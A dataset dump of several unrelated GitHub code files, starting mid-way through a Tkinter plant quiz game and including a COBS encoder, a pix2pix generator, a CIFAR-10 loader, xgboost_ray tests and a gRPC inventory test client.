textvariable=self.var_wrong)\n\n self.default_button_color = self.cget(\"bg\")\n\n self.set_grid()\n self.show_question()\n\n def set_grid(self):\n self.photolabel.grid(row=0, padx=10, pady=10)\n self.questionlabel.grid(row=1, pady=(0, 20))\n\n # inside self.answerframe\n 
self.family_label.grid(row=0, column=0)\n self.family_entry.grid(row=0, column=1)\n\n self.plantname_label.grid(row=1, column=0)\n self.plantname_entry.grid(row=1, column=1)\n\n self.correct_answer_label.grid(row=2, column=0, columnspan=2)\n\n self.check_button.grid(row=3, column=0)\n self.next_button.grid(row=3, column=1)\n\n # inside self.rateframe\n self.correct_label.grid(row=0, column=0)\n self.wrong_label.grid(row=0, column=1)\n\n # grid subframes\n self.rateframe.grid(row=8)\n\n self.answer_frame.grid(row=2)\n\n self.grid(row=0, column=0)\n\n def show_question(self):\n self.active_qst = self.quizgen.get_question()\n\n if self.active_qst is None:\n self.questiontext.set(\"No more questions available\")\n return None\n\n print(self.active_qst.correct_answer)\n\n self.check_button.config(state=tk.ACTIVE)\n self.next_button.config(state=tk.DISABLED)\n\n self.family_entry.config(bg=self.default_button_color)\n self.plantname_entry.config(bg=self.default_button_color)\n\n self.family_input.set(\"\")\n self.plantname_input.set(\"\")\n\n self.correct_answer.set(\"\")\n\n # show image\n maxsize = (600, 400)\n\n self.active_qst.image.thumbnail(maxsize, PIL.Image.ANTIALIAS)\n img = PIL.ImageTk.PhotoImage(self.active_qst.image)\n\n self.photolabel.config(image=img)\n self.tkimage = img\n\n self.photolabel.place(x=0, y=0, width=maxsize[0], height=maxsize[1])\n self.photolabel.grid(row=0)\n\n self.questiontext.set(self.active_qst.question)\n\n def check_answer(self):\n self.check_button.config(state=tk.DISABLED)\n self.next_button.config(state=tk.ACTIVE)\n\n correct_answer_parts = self.active_qst.correct_answer.lower().split('-')\n\n for i, s in enumerate(correct_answer_parts):\n correct_answer_parts[i] = s.strip()\n\n correct_family = correct_answer_parts[0]\n correct_name = correct_answer_parts[1]\n\n self.correct_answer.set(correct_family + \" - \" + correct_name)\n\n given_family = self.family_input.get().lower().strip()\n given_name = self.plantname_input.get().lower().strip()\n\n if given_family == correct_family:\n self.num_correct += 1\n self.family_entry.config(bg=\"green\")\n else:\n self.num_missed += 1\n self.family_entry.config(bg=\"red\")\n\n if given_name == correct_name:\n self.num_correct += 1\n self.plantname_entry.config(bg=\"green\")\n else:\n self.num_missed += 1\n self.plantname_entry.config(bg=\"red\")\n\n self.update_counter()\n\n def update_counter(self):\n self.var_correct.set(\"Correct: \" + str(self.num_correct))\n self.var_wrong.set(\"Wrong: \" + str(self.num_missed))\n\n\n\n\n\n\n\n\n","repo_name":"BeckmaR/QuizGame","sub_path":"quizgame/guessinggame.py","file_name":"guessinggame.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43602816491","text":"from cobs import cobs\n\n\ndef bytes_to_int(inp):\n return int.from_bytes(inp, byteorder=\"little\", signed=False)\n\n\nclass CobsHandler:\n zero_byte = bytes([0])\n\n def __init__(self, *args):\n self.elements = [x for x in args]\n\n def get_components(self, inp):\n\n num_zeros = inp.count(CobsHandler.zero_byte)\n if num_zeros != (len(self.elements) + 1):\n raise ValueError(f\"why god {inp} {self.elements}\")\n\n splitted = inp.split(CobsHandler.zero_byte)\n\n if len(splitted) != (2 + len(self.elements)):\n raise ValueError(\"Wrong number of elements\")\n\n if len(splitted[0]) != 0:\n raise ValueError(\"Head is wrong\")\n\n if len(splitted[-1]) != 0:\n raise ValueError(\"Tail is wrong\")\n\n component_dict = dict()\n for 
entry_name, entry in zip(self.elements, splitted[1:-1]):\n component_dict[entry_name] = cobs.decode(entry)\n return component_dict\n\n @staticmethod\n def _encode_element(element, force=False):\n\n if isinstance(element, bytes) or isinstance(element, bytearray):\n return element\n elif isinstance(element, str):\n return element.encode()\n elif isinstance(element, int):\n bits = element.bit_length()\n num_bytes = bits // 8 + 1 if bits % 8 != 0 else 0\n return element.to_bytes(num_bytes, byteorder=\"little\", signed=False)\n if force:\n return bytes(element)\n return None\n\n @staticmethod\n def encode(inp):\n m = CobsHandler._encode_element(inp)\n if m is None:\n m = CobsHandler.zero_byte.join(\n map(lambda x: cobs.encode(CobsHandler._encode_element(x, True)), inp)\n )\n return CobsHandler.zero_byte + m + CobsHandler.zero_byte\n","repo_name":"diogoabnunes/SDLE-Projects","sub_path":"proj1/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23992275191","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport config\n\n\nclass Block(nn.Module):\n def __init__(self, in_channels, out_channels, down=True, act=\"relu\", use_dropout=False):\n super(Block, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 4, 2, 1, bias=False, padding_mode=\"reflect\")\n if down\n else nn.ConvTranspose2d(in_channels, out_channels, 4, 2, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU() if act == \"relu\" else nn.LeakyReLU(0.2),\n )\n\n self.use_dropout = use_dropout\n self.dropout = nn.Dropout(0.5)\n self.down = down\n\n def forward(self, x):\n x = self.conv(x)\n return self.dropout(x) if self.use_dropout else x\n\n\nclass Generator(nn.Module):\n def __init__(self, in_channels=3, features=64):\n super().__init__()\n self.initial_down = nn.Sequential(\n nn.Conv2d(in_channels, features, 4, 2, 1, padding_mode=\"reflect\"),\n nn.LeakyReLU(0.2),\n )\n self.down1 = Block(features, features * 2, down=True, act=\"leaky\", use_dropout=False)\n self.down2 = Block(\n features * 2, features * 4, down=True, act=\"leaky\", use_dropout=False\n )\n self.down3 = Block(\n features * 4, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down4 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down5 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down6 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.bottleneck = nn.Sequential(\n nn.Conv2d(features * 8, features * 8, 4, 2, 1), nn.ReLU()\n )\n\n self.up1 = Block(features * 8, features * 8, down=False, act=\"relu\", use_dropout=True)\n self.up2 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=True\n )\n self.up3 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=True\n )\n self.up4 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=False\n )\n self.up5 = Block(\n features * 8 * 2, features * 4, down=False, act=\"relu\", use_dropout=False\n )\n self.up6 = Block(\n features * 4 * 2, features * 2, down=False, act=\"relu\", use_dropout=False\n )\n self.up7 = Block(features * 2 * 2, features, down=False, act=\"relu\", use_dropout=False)\n self.final_up = nn.Sequential(\n nn.ConvTranspose2d(features * 2, in_channels, kernel_size=4, stride=2, 
padding=1),\n nn.Tanh(),\n )\n\n def forward(self, x):\n d1 = self.initial_down(x)\n d2 = self.down1(d1)\n d3 = self.down2(d2)\n d4 = self.down3(d3)\n d5 = self.down4(d4)\n d6 = self.down5(d5)\n d7 = self.down6(d6)\n bottleneck = self.bottleneck(d7)\n up1 = self.up1(bottleneck)\n up2 = self.up2(torch.cat([up1, d7], 1))\n up3 = self.up3(torch.cat([up2, d6], 1))\n up4 = self.up4(torch.cat([up3, d5], 1))\n up5 = self.up5(torch.cat([up4, d4], 1))\n up6 = self.up6(torch.cat([up5, d3], 1))\n up7 = self.up7(torch.cat([up6, d2], 1))\n return self.final_up(torch.cat([up7, d1], 1))\n\ndef load_model(path):\n model = Generator(in_channels=3, features=64)\n opt_gen = optim.Adam(model.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999))\n checkpoint = torch.load(path, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint[\"state_dict\"])\n opt_gen.load_state_dict(checkpoint[\"optimizer\"])\n for param_grp in opt_gen.param_groups:\n param_grp[\"lr\"] = config.LEARNING_RATE\n print(config.DEVICE)\n return model\n","repo_name":"Afsanay/pix2pixStreamlit","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25088584835","text":"\"\"\"\nCreated by Philippenko, 17th February 2022.\n\"\"\"\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom PathDataset import get_path_to_datasets\nfrom Timer import Timer\n\n\nclass Dataset:\n\n def __init__(self, batch_size, dataset_name = \"cifar10\") -> None:\n super().__init__()\n self.batch_size = batch_size\n self.dataset_name = dataset_name\n self.dataset_class = self.__get_dataset_class__()\n\n def get_loaders(self):\n timer = Timer()\n timer.start()\n\n ### We set pin_memory to True if we push the dataset from the CPU to the GPU, this speed-up the transfer.\n pin_memory = True if torch.cuda.is_available() else False\n\n ### Get train/test transformers to preprocess data\n transform_train, transform_test = self.__data_transfomer__()\n\n num_workers = 1 # Suggested max number of worker in my GPU's system is 1\n\n ### Get train loader\n train_set = self.dataset_class(root=get_path_to_datasets() + '/dataset', train=True,\n download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=self.batch_size, pin_memory=pin_memory,\n shuffle=True, num_workers=num_workers)\n full_train_loader = torch.utils.data.DataLoader(train_set, batch_size=6000, pin_memory=pin_memory,\n shuffle=True, num_workers=num_workers)\n\n ### Get test loader\n test_set = self.dataset_class(root=get_path_to_datasets() + './dataset', train=False,\n download=True, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=self.batch_size, pin_memory=pin_memory,\n shuffle=False, num_workers=num_workers)\n timer.stop()\n return train_loader, full_train_loader, test_loader, timer.time\n\n def __get_dataset_class__(self):\n \"\"\"Get the class of the given dataset to later load it.\"\"\"\n if self.dataset_name == \"cifar10\":\n return torchvision.datasets.CIFAR10\n else:\n raise ValueError(\"The given dataset is not recognized.\")\n\n def __data_transfomer__(self):\n\n if self.dataset_name == \"cifar10\":\n ### Image shape: torch.Size([128, 3, 32, 32])\n\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n transform_train = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n 
transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n else:\n raise ValueError(\"The given dataset is not recognized.\")\n\n return transform_train, transform_test","repo_name":"philipco/benchmark-pytorch","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1755433373","text":"import sys\nread = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nn = int(read())\ntree = [[] for _ in range(n + 1)]\nvisit = [False for _ in range(n + 1)]\nans = 0\ndp = [[0, 1] for _ in range(n + 1)]\n\n\ndef rec(root):\n visit[root] = True\n for nxt in tree[root]:\n if visit[nxt]:\n continue\n rec(nxt)\n dp[root][0] += dp[nxt][1]\n dp[root][1] += min(dp[nxt][0], dp[nxt][1])\n\n\nfor _ in range(n - 1):\n u, v = map(int, read().split())\n tree[v].append(u)\n tree[u].append(v)\nrec(1)\nprint(min(dp[1]))\n","repo_name":"devkeon/Algorithm","sub_path":"Baekjoon/boj2xxx/boj2533.py","file_name":"boj2533.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"345144302","text":"import os\nimport sys\nimport yaml\nimport pickle\nimport shutil\nimport argparse\nfrom torch.utils.data import DataLoader\nsys.path.append('..')\n\nfrom midigen.models.gpt2.gpt2 import GPT\nfrom midigen.data.dataset import EPianoDataset\nfrom midigen.data.neural_processor import encode_midi, decode_midi\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_type', default='GPT', help=\"Type of model: GPT or Transformer\")\n parser.add_argument('--model_path', help=\"Path to model weights\")\n parser.add_argument('--output_dir', help=\"Path to output results\")\n parser.add_argument('--dataset_pickle', help=\"Path to model weights\")\n parser.add_argument('--number_of_seqs', default=10, type=int, help='Number of primer sequences to generate from')\n parser.add_argument('--max_seq', default=512, type=int, help='Length of primer sequence')\n parser.add_argument('--target_len', default=2048, type=int, help=\"Length of model output\")\n parser.add_argument('--beam', default=0, type=int, help=\"Number of hypothesis in beam search\")\n parser.add_argument('--device', default='cpu', help=\"Path to model weights\")\n args = parser.parse_args()\n\n\n if args.model_type == 'GPT':\n model = GPT.load(args.model_path, device=args.device).to(args.device).eval()\n else:\n raise NotImplementedError(f'Model {args.model_type} not implemented yet.')\n with open(args.dataset_pickle, 'rb') as f:\n data = pickle.load(f)\n\n test_dataset = EPianoDataset(data['test'], max_seq=args.max_seq, random_seq=False,\n num_files=5, type='test')\n\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n print(f'Saving midi files to {args.output_dir} with beam of {args.beam}')\n for idx in range(args.number_of_seqs):\n primer, _ = test_dataset[idx]\n primer = primer.to(args.device)\n decode_midi(primer[:args.max_seq].cpu().numpy(), file_path=os.path.join(args.output_dir, f\"primer_{idx}.mid\"))\n rand_seq = model.generate(primer[:args.max_seq], args.target_len, beam=args.beam)\n decode_midi(rand_seq[0].cpu().numpy(), file_path=os.path.join(args.output_dir, 
f\"generated_beam{args.beam}_{idx}.mid\"))\n","repo_name":"Sashmark97/midigen","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"29491458391","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nimport numpy as np\nimport ray\nimport xgboost as xgb\nfrom ray.exceptions import RayActorError, RayTaskError\nfrom ray.util.scheduling_strategies import PlacementGroupSchedulingStrategy\nfrom scipy.sparse import csr_matrix\n\nfrom xgboost_ray import RayDMatrix, RayParams, RayShardingMode, predict, train\nfrom xgboost_ray.callback import DistributedCallback\nfrom xgboost_ray.main import RayXGBoostTrainingError\nfrom xgboost_ray.tests.utils import get_num_trees\n\n\ndef _make_callback(tmpdir: str) -> DistributedCallback:\n class TestDistributedCallback(DistributedCallback):\n logdir = tmpdir\n\n def on_init(self, actor, *args, **kwargs):\n log_file = os.path.join(self.logdir, f\"rank_{actor.rank}.log\")\n actor.log_fp = open(log_file, \"at\")\n actor.log_fp.write(f\"Actor {actor.rank}: Init\\n\")\n actor.log_fp.flush()\n\n def before_data_loading(self, actor, data, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before loading\\n\")\n actor.log_fp.flush()\n\n def after_data_loading(self, actor, data, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After loading\\n\")\n actor.log_fp.flush()\n\n def before_train(self, actor, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before train\\n\")\n actor.log_fp.flush()\n\n def after_train(self, actor, result_dict, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After train\\n\")\n actor.log_fp.flush()\n\n def before_predict(self, actor, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before predict\\n\")\n actor.log_fp.flush()\n\n def after_predict(self, actor, predictions, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After predict\\n\")\n actor.log_fp.flush()\n\n return TestDistributedCallback()\n\n\nclass XGBoostRayEndToEndTest(unittest.TestCase):\n \"\"\"In this test suite we validate Ray-XGBoost multi class prediction.\n\n First, we validate that XGBoost is able to achieve 100% accuracy on\n a simple training task.\n\n Then we split the dataset into two halves. These halves don't have access\n to all relevant data, so overfit on their respective data. I.e. the first\n half always predicts feature 2 -> label 2, while the second half always\n predicts feature 2 -> label 3.\n\n We then train using Ray XGBoost. 
Again both halves will be trained\n separately, but because of Rabit's allreduce, they should end up being\n able to achieve 100% accuracy, again.\"\"\"\n\n def setUp(self):\n repeat = 8 # Repeat data a couple of times for stability\n self.x = np.array(\n [\n [1, 0, 0, 0], # Feature 0 -> Label 0\n [0, 1, 0, 0], # Feature 1 -> Label 1\n [0, 0, 1, 1], # Feature 2+3 -> Label 2\n [0, 0, 1, 0], # Feature 2+!3 -> Label 3\n ]\n * repeat\n )\n self.y = np.array([0, 1, 2, 3] * repeat)\n\n self.params = {\n \"booster\": \"gbtree\",\n \"nthread\": 1,\n \"max_depth\": 2,\n \"objective\": \"multi:softmax\",\n \"num_class\": 4,\n }\n\n def tearDown(self):\n if ray.is_initialized:\n ray.shutdown()\n\n def testSingleTraining(self):\n \"\"\"Test that XGBoost learns to predict full matrix\"\"\"\n dtrain = xgb.DMatrix(self.x, self.y)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(self.x)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n def testHalfTraining(self):\n \"\"\"Test that XGBoost learns to predict half matrices individually\"\"\"\n x_first = self.x[::2]\n y_first = self.y[::2]\n\n x_second = self.x[1::2]\n y_second = self.y[1::2]\n\n # Test case: The first model only sees feature 2 --> label 2\n # and the second model only sees feature 2 --> label 3\n test_X = xgb.DMatrix(np.array([[0, 0, 1, 1], [0, 0, 1, 0]]))\n test_y_first = [2, 2]\n test_y_second = [3, 3]\n\n # First half\n dtrain = xgb.DMatrix(x_first, y_first)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(x_first)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(y_first), list(pred_y))\n\n pred_test = bst.predict(test_X)\n self.assertSequenceEqual(test_y_first, list(pred_test))\n\n # Second half\n dtrain = xgb.DMatrix(x_second, y_second)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(x_second)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(y_second), list(pred_y))\n\n pred_test = bst.predict(test_X)\n self.assertSequenceEqual(test_y_second, list(pred_test))\n\n def test_client_actor_cpus(self):\n ray.init(num_cpus=5, num_gpus=0)\n\n @ray.remote\n class DummyTrainActor:\n def test(self):\n import xgboost_ray\n\n return xgboost_ray.main._ray_get_actor_cpus()\n\n actor = DummyTrainActor.options(num_cpus=2).remote()\n assert ray.get(actor.test.remote()) == 2\n\n pg = ray.util.placement_group([{\"CPU\": 2}])\n ray.get(pg.ready())\n actor2 = DummyTrainActor.options(\n num_cpus=2,\n scheduling_strategy=PlacementGroupSchedulingStrategy(placement_group=pg),\n ).remote()\n assert ray.get(actor2.test.remote()) == 2\n\n def _testJointTraining(self, sharding=RayShardingMode.INTERLEAVED, softprob=False):\n \"\"\"Train with Ray. 
The data will be split, but the trees\n should be combined together and find the true model.\"\"\"\n params = self.params.copy()\n if softprob:\n params[\"objective\"] = \"multi:softprob\"\n\n bst = train(\n params,\n RayDMatrix(self.x, self.y, sharding=sharding),\n ray_params=RayParams(num_actors=2),\n )\n\n x_mat = xgb.DMatrix(self.x)\n pred_y = bst.predict(x_mat)\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n x_mat = RayDMatrix(self.x, sharding=sharding)\n pred_y = predict(bst, x_mat, ray_params=RayParams(num_actors=2))\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n # try on an odd number of rows\n bst = train(\n params,\n RayDMatrix(self.x[:-1], self.y[:-1], sharding=sharding),\n ray_params=RayParams(num_actors=2),\n )\n\n x_mat = RayDMatrix(self.x[:-1], sharding=sharding)\n pred_y = predict(bst, x_mat, ray_params=RayParams(num_actors=2))\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y[:-1]), list(pred_y))\n\n def testJointTrainingInterleaved(self):\n ray.init(num_cpus=2, num_gpus=0)\n self._testJointTraining(sharding=RayShardingMode.INTERLEAVED)\n self._testJointTraining(sharding=RayShardingMode.INTERLEAVED, softprob=True)\n\n def testJointTrainingBatch(self):\n ray.init(num_cpus=2, num_gpus=0)\n self._testJointTraining(sharding=RayShardingMode.BATCH)\n self._testJointTraining(sharding=RayShardingMode.BATCH, softprob=True)\n\n def testTrainPredict(\n self, init=True, remote=None, softprob=False, **ray_param_dict\n ):\n \"\"\"Train with evaluation and predict\"\"\"\n if init:\n ray.init(num_cpus=2, num_gpus=0)\n\n dtrain = RayDMatrix(self.x, self.y)\n\n params = self.params\n if softprob:\n params = params.copy()\n params[\"objective\"] = \"multi:softprob\"\n\n evals_result = {}\n bst = train(\n params,\n dtrain,\n num_boost_round=38,\n ray_params=RayParams(num_actors=2, **ray_param_dict),\n evals=[(dtrain, \"dtrain\")],\n evals_result=evals_result,\n _remote=remote,\n )\n\n self.assertEqual(get_num_trees(bst), 38)\n\n self.assertTrue(\"dtrain\" in evals_result)\n\n x_mat = RayDMatrix(self.x)\n pred_y = predict(\n bst,\n x_mat,\n ray_params=RayParams(num_actors=2, **ray_param_dict),\n _remote=remote,\n )\n\n if softprob:\n self.assertEqual(pred_y.shape[1], len(np.unique(self.y)))\n pred_y = np.argmax(pred_y, axis=1)\n\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n def testTrainPredictSoftprob(self):\n \"\"\"Train with evaluation and predict on softprob objective\n (which returns predictions in a 2d array)\n \"\"\"\n self.testTrainPredict(init=True, softprob=True)\n\n def testTrainPredictRemote(self):\n \"\"\"Train with evaluation and predict in a remote call\"\"\"\n self.testTrainPredict(init=True, remote=True)\n\n def testTrainPredictClient(self):\n \"\"\"Train with evaluation and predict in a client session\"\"\"\n if ray.__version__ <= \"1.2.0\":\n self.skipTest(\"Ray client mocks do not work in Ray <= 1.2.0\")\n from ray.util.client.ray_client_helpers import ray_start_client_server\n\n ray.init(num_cpus=2, num_gpus=0)\n self.assertFalse(ray.util.client.ray.is_connected())\n with ray_start_client_server():\n self.assertTrue(ray.util.client.ray.is_connected())\n\n self.testTrainPredict(init=False, remote=None)\n\n def testDistributedCallbacksTrainPredict(self, init=True, remote=False):\n \"\"\"Test distributed 
callbacks for train/predict\"\"\"\n tmpdir = tempfile.mkdtemp()\n test_callback = _make_callback(tmpdir)\n\n self.testTrainPredict(\n init=init, remote=remote, distributed_callbacks=[test_callback]\n )\n rank_0_log_file = os.path.join(tmpdir, \"rank_0.log\")\n rank_1_log_file = os.path.join(tmpdir, \"rank_1.log\")\n self.assertTrue(os.path.exists(rank_1_log_file))\n\n rank_0_log = open(rank_0_log_file, \"rt\").read()\n self.assertEqual(\n rank_0_log,\n \"Actor 0: Init\\n\"\n \"Actor 0: Before loading\\n\"\n \"Actor 0: After loading\\n\"\n \"Actor 0: Before train\\n\"\n \"Actor 0: After train\\n\"\n \"Actor 0: Init\\n\"\n \"Actor 0: Before loading\\n\"\n \"Actor 0: After loading\\n\"\n \"Actor 0: Before predict\\n\"\n \"Actor 0: After predict\\n\",\n )\n shutil.rmtree(tmpdir)\n\n def testDistributedCallbacksTrainPredictClient(self):\n \"\"\"Test distributed callbacks for train/predict via Ray client\"\"\"\n\n if ray.__version__ <= \"1.2.0\":\n self.skipTest(\"Ray client mocks do not work in Ray <= 1.2.0\")\n from ray.util.client.ray_client_helpers import ray_start_client_server\n\n ray.init(num_cpus=2, num_gpus=0)\n self.assertFalse(ray.util.client.ray.is_connected())\n with ray_start_client_server():\n self.assertTrue(ray.util.client.ray.is_connected())\n\n self.testDistributedCallbacksTrainPredict(init=False, remote=None)\n\n def testFailPrintErrors(self):\n \"\"\"Test that XGBoost training errors are propagated\"\"\"\n x = np.random.uniform(0, 1, size=(100, 4))\n y = np.random.randint(0, 2, size=100)\n\n train_set = RayDMatrix(x, y)\n\n try:\n train(\n {\n \"objective\": \"multi:softmax\",\n \"num_class\": 2,\n \"eval_metric\": [\"logloss\", \"error\"],\n }, # This will error\n train_set,\n evals=[(train_set, \"train\")],\n ray_params=RayParams(num_actors=1, max_actor_restarts=0),\n )\n except RuntimeError as exc:\n self.assertTrue(exc.__cause__)\n self.assertTrue(isinstance(exc.__cause__, RayActorError))\n\n self.assertTrue(exc.__cause__.__cause__)\n self.assertTrue(isinstance(exc.__cause__.__cause__, RayTaskError))\n\n self.assertTrue(exc.__cause__.__cause__.cause)\n self.assertTrue(\n isinstance(exc.__cause__.__cause__.cause, RayXGBoostTrainingError)\n )\n\n self.assertIn(\n \"label and prediction size not match\", str(exc.__cause__.__cause__)\n )\n\n def testKwargsValidation(self):\n x = np.random.uniform(0, 1, size=(100, 4))\n y = np.random.randint(0, 1, size=100)\n\n train_set = RayDMatrix(x, y)\n\n with self.assertRaisesRegex(TypeError, \"totally_invalid_kwarg\"):\n train(\n {\n \"objective\": \"multi:softmax\",\n \"num_class\": 2,\n \"eval_metric\": [\"logloss\", \"error\"],\n },\n train_set,\n evals=[(train_set, \"train\")],\n ray_params=RayParams(num_actors=1, max_actor_restarts=0),\n totally_invalid_kwarg=\"\",\n )\n\n def testRanking(self):\n Xrow = np.array([1, 2, 6, 8, 11, 14, 16, 17])\n Xcol = np.array([0, 0, 1, 1, 2, 2, 3, 3])\n X = csr_matrix((np.ones(shape=8), (Xrow, Xcol)), shape=(20, 4)).toarray()\n y = np.array(\n [\n 0.0,\n 1.0,\n 1.0,\n 0.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 1.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 1.0,\n 1.0,\n 0.0,\n 0.0,\n ]\n )\n\n qid = np.array([0] * 5 + [1] * 5 + [2] * 5 + [3] * 5)\n dtrain = RayDMatrix(X, label=y, qid=qid)\n\n params = {\n \"eta\": 1,\n \"objective\": \"rank:pairwise\",\n \"eval_metric\": [\"auc\", \"aucpr\"],\n \"max_depth\": 1,\n }\n evals_result = {}\n train(\n params,\n dtrain,\n 10,\n evals=[(dtrain, \"train\")],\n evals_result=evals_result,\n ray_params=RayParams(num_actors=2, max_actor_restarts=0),\n )\n 
auc_rec = evals_result[\"train\"][\"auc\"]\n self.assertTrue(all(p <= q for p, q in zip(auc_rec, auc_rec[1:])))\n auc_rec = evals_result[\"train\"][\"aucpr\"]\n self.assertTrue(all(p <= q for p, q in zip(auc_rec, auc_rec[1:])))\n\n @unittest.skipIf(\n xgb.__version__ < \"1.3.0\", f\"not supported in xgb version {xgb.__version__}\"\n )\n def testFeatureWeightsParam(self):\n \"\"\"Test the feature_weights parameter for xgb version >= 1.3.0.\n Adapted from the official demo codes:\n http://xgboost.readthedocs.io/en/stable/python/examples/\n feature_weights.html\"\"\"\n\n rng = np.random.RandomState(1994)\n\n kRows = 1000\n kCols = 10\n\n X = rng.randn(kRows, kCols)\n y = rng.randn(kRows)\n fw = np.ones(shape=(kCols,))\n for i in range(kCols):\n fw[i] *= float(i)\n train_set = RayDMatrix(X, y, feature_weights=fw)\n\n evals_result = {}\n bst = train(\n {\n \"objective\": \"reg:squarederror\",\n \"eval_metric\": [\"rmse\", \"error\"],\n \"colsample_bynode\": 0.1,\n },\n train_set,\n num_boost_round=250,\n evals_result=evals_result,\n evals=[(train_set, \"train\")],\n verbose_eval=False,\n ray_params=RayParams(\n num_actors=2, cpus_per_actor=1 # Number of remote actors\n ),\n )\n\n feature_map = bst.get_fscore()\n # feature zero has 0 weight\n self.assertTrue(feature_map.get(\"f0\", None) is None)\n self.assertTrue(max(feature_map.values()) == feature_map.get(\"f9\"))\n\n\nif __name__ == \"__main__\":\n import sys\n\n import pytest\n\n sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"ray-project/xgboost_ray","sub_path":"xgboost_ray/tests/test_end_to_end.py","file_name":"test_end_to_end.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"}
{"seq_id":"7943434056","text":"import json\nimport grpc\nimport consul\n\nfrom google.protobuf import empty_pb2\n\nfrom inventory_srv.proto import inventory_pb2, inventory_pb2_grpc\nfrom inventory_srv.config import settings\n\n\nclass InventroyTest:\n def __init__(self):\n # connect to the gRPC server\n c = consul.Consul(host=\"192.168.178.138\", port=8500)\n # get all the services\n services = c.agent.services()\n ip = \"\"\n port = \"\"\n for key, value in services.items():\n if value[\"Service\"] == settings.SERVICE_NAME:\n ip = value[\"Address\"]\n port = value[\"Port\"]\n break\n if not ip:\n raise Exception()\n channel = grpc.insecure_channel(f\"{ip}:{port}\")\n self.inventory_stub = inventory_pb2_grpc.InventoryStub(channel)\n\n def set_inv(self):\n rsp = self.inventory_stub.SetInv(\n inventory_pb2.GoodsInvInfo(goodsId=10, num=110)\n )\n\n def get_inv(self):\n rsp = self.inventory_stub.InvDetail(\n inventory_pb2.GoodsInvInfo(goodsId=3)\n )\n print(rsp.num)\n\n def sell(self):\n goods_list = [(1, 10), (2, 20), (3, 30)]\n req = inventory_pb2.SellInfo()\n for goodsId, num in goods_list:\n req.goodsInfo.append(inventory_pb2.GoodsInvInfo(goodsId=goodsId, num=num))\n rsp = self.inventory_stub.Sell(req)\n\n def reback(self):\n goods_list = [(1, 6), (3, 3)]\n request = inventory_pb2.SellInfo()\n for goodsId, num in goods_list:\n request.goodsInfo.append(inventory_pb2.GoodsInvInfo(goodsId=goodsId, num=num))\n rsp = self.inventory_stub.Reback(request)\n\n\nif __name__ == 